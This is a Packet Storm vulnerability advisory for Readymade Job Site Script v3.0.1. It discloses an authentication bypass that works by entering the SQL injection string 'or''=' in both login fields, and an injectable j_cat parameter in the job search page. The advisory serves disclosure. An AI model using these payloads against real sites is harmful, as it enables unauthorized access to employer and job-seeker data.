Readymade Job Site Script 3.0.1 SQL Injection

2017-03-15T00:00:00
ID PACKETSTORM:141649
Type packetstorm
Reporter Bilal Kardadou
Modified 2017-03-15T00:00:00

Description

                                        
                                            `################################################  
#Title: READYMADE JOB SITE SCRIPT v3.0.1 - Authentication Bypass & SQL  
injection  
#Credit: Bilal KARDADOU  
#Vendor: http://www.2daybiz.com  
#Vendor URL:  
http://www.2daybiz.com/content/products/40-readymade-job-site-script.php  
#Product: READYMADE JOB SITE SCRIPT v3.0.1  
#Google Dork: N/A  
################################################  
#  
# Product & Service Introduction:  
#  
# Our Readymade PHP job site script make your own job portal website set  
in motion,  
# with our advanced PHP job site script that helps job seekers to search  
jobs in efficient manner.  
# Job portal script are developed in such way that has functionalities  
similar to leading job portal like Naukri.com, Monster.com, etc..,  
# our script offer various services for employers as well as job seekers.  
#  
#  
# http://localhost/eboss/employer/employer_login.php  
# http://localhost/eboss/seeker_login.php  
#  
# Username: 'or''='  
# Password: 'or''='  
#  
#  
# --SQL Injection--  
# http://localhost/eboss/job_search_result.php?j_cat=11[SQL]&no_no=1  
#  
# PoC:  
# http://prnt.sc/ekcek6  
#  
# Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127)  
################################################  
  
--   
*Bilal Kardadou*  
IT Security Consultant  
*E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |  
`